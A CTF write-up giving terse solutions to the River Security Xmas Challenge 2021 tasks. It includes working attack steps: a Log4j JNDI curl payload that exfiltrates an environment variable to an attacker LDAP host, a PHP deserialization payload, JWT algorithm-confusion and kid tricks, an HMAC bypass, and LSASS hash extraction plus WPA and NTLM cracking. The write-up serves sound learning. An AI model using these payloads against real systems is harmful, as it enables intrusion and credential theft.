Solutions for River Security Xmas Challenge (RSXC) 2021
Challenges were available on http://rsxc.no
Solution: nmap -p30000-31000 rsxc.no
$ nc rsxc.no 30780
RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}
RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}
Solution: Brute force 1 byte with python script
$ echo -en "\xd4" | nc rsxc.no 20002
RSXC{You_found_the_magic_byte_I_wanted_Good_job!}
RSXC{You_found_the_magic_byte_I_wanted_Good_job!}
data -> Base64 -> Base58 (ripple) -> Bzip2 -> Base85 -> morse code -> hex -> base32 ->
RSXC{I_hope_you_used_cyber_chef_it_does_make_it_alot_easier}
Known plaintext: RSXC
XOR each byte until plaintext found
Gives key: 0x88 0xc5 0x54 0xd5
Use this key cyclical on input
RSXC{Most_would_say_XOR_isn't_that_useful_anymore}
PCAP file, open in wireshark
Identify TCP stream: IRC connection
"What about encrypting a zip file containing the flag? Let's say a 10 digit long number above 9 954 000 000 as the password?"
Identify FTP transfer: flag.zip, extract to file\
Brutefore password with python script
Found password: 9954359864
Extracting flag.txt
RSXC{Good_job_analyzing_the_pcap_did_you_see_the_hint?}
Vigenère cipher
Manually brute key until known prefix RSXC: YMZH
Through trial and error next key byte is: G
full key YMZHG ->
RSXC{isthisnotjustafancycaesarcipher}
Exif contains thumbnail
$ exif -e 07-challenge.jpg
Wrote file '07-challenge.jpg.modified.jpeg'
thumbnail contains flag:
RSXC{Sometimes_metadata_hides_stuff}
Decrement note ID in URL to find hidden note with flag
http://rsxc.no:20008/notes.php?id=0
RSXC{Remember_to_secure_your_direct_object_references}
md5 hash as identifier.
"note0" -> 65b29a77142a5c237d7b21c005b72157
"flag" -> http://rsxc.no:20009/notes.php?id=327a6c4304ad5938eaf0efb6cc3e53dc
RSXC{MD5_should_not_be_used_for_security.Especially_not_with_known_plaintext}
Server sends a Flag HTTP header:
RSXC{Sometimes_headers_can_tell_you_something_useful}
Since q
is selected based on p*p
we know n
is approximately p**3
(p cubed)
We approximate the 3rd root of n
and iterate the prevprimes to find the correct value of p
and hence q
decoding the ciphertext gives:
RSXC{Good_Job!I_see_you_know_how_to_do_some_math_and_how_rsa_works}
Read "encoding" and input from socket, perform action, send response back. Repeat 100 times within 12 seconds
RSXC{Seems_like_you_have_a_knack_for_encoding_and_talking_to_servers!}
React web app
Todos.js, base64 encoded string
RSXC{it_might_be_there_even_if_you_don't_include_it!}
Server sets JWT with algorithm "RS256", and payload with username "test"
Public key is available for verification.
Changing algorithm to "HS256" with public key as secret also creates a validated JWT
Changing username to "admin" reveals flag:
RSXC{You_have_to_remember_to_limit_what_algorithms_are_allowed}
Modifying the key ID (kid) header allows us to point to our own public key URL
This allows us to sign the token, and have the server validate with our key.
Modifying kid and username in payload gives flag:
RSXC{Don't_let_others_decide_where_your_keys_are_located}
Obfuscated script. Deobfuscate in several levels gives an invalid payload url and a "hidden" base64 string which contains the flag:
RSXC{Don't_blindly_trust_obfuscated_code_it_might_do_something_bad}
PHP source available. Files read based on unserialized user input.
Craft an object serialization of the Card clss: O:4:"Card":1:{s:4:"file";s:8:"flag.txt";}
Pass it base64 encoded as card GET parameter and flag.txt is read:
RSXC{Care_needs_to_be_taken_with_user_supplied_input.It_should_never_be_trusted}
Unpack the docker image repository. Locate previous layer with file intact, extract and voila
RSXC{Now_you_know_that_docker_images_are_like_onions.They_have_many_layers}
Another include with filename in URL
just input base64('flag.txt') as card in url and get flag
RSXC{It_is_not_smart_to_let_people_include_whatever_they_want}
PHP code provided reads JSON hmac from input data.
parameters to hash_hmac is badly ordered and lets us change algorithm. We also have the key, but not the data parameter.
However we can use an invalid algorithm for hash_hmac to return false, and set the input hmac to false:
$ curl -d '{"host":"none","hmac":0}' http://rsxc.no:20020/api.php
RSXC{You_have_to_have_the_right_order_for_arguments!}
RSXC{You_have_to_have_the_right_order_for_arguments!}
LSASS.exe dump.
can get password hash from pypykatz:
== MSV ==
Username: river-security-xmas
Domain: DESKTOP-V1MQH3P
LM: NA
NT: 7801ee9c5762bb027ee224d54cb8f62e
SHA1: bebad302f8e64b59279c3a6747db0e076800d9ca
Challenge text mentions "rock our world" hinting to RockYou dictionary (thanks google)
Using hashcat with rockyou dictionary from kali on the NTLM password hash gives password:
alliwantforchristmasisyou
File is a wifi traffic capture file of a WPA reauthentication.
One again the challenge text mentiones "you rock" hinting to rockyou.txt dictionary.
We filter the dictionary for passwords starting with S, as per challenge text.
Then run aircrack-ng on the cap file.
returning in key: Santaclaws99
Decrypt capture file with airdecap-ng and opening in wireshark reveals a single TCP stream.
Following the stream we get the flag:
RSXC{WIFI_is_fun}
Scan server with dirb, looking for flag.txt
$ dirb http://rsxc.no:20023/ wordlists/big.txt -X /flag.txt
+ http://rsxc.no:20023/logfile/flag.txt (CODE:200|SIZE:120)
RSXC{Content_discovery_is_a_useful_to_know.Good_job_finding_the_flag}
The challenge text hints to logging and most likely Log4j vulnerability
Experimenting with headers and ${jndi} calls leads to an attack vector\
Since I dont want to install java on my public facing server, i ran JNDIExploit-1.2 locally,
and portforwarded a public facing port to that. Then running the attack query
$ curl rsxc.no:20024 -v -H "User-Agent: \${jndi:ldap://<REDACTEDIP>:8008/\${env:FLAG}}"
Leads to a received LDAP query:
[+] Received LDAP Query: base32_KJJVQQ33K5SV6ZDPL5WGS23FL5WG6Z3HNFXGOX3SNFTWQ5B7PU
which when base32 decoded gives the flag:
RSXC{We_do_like_logging_right?}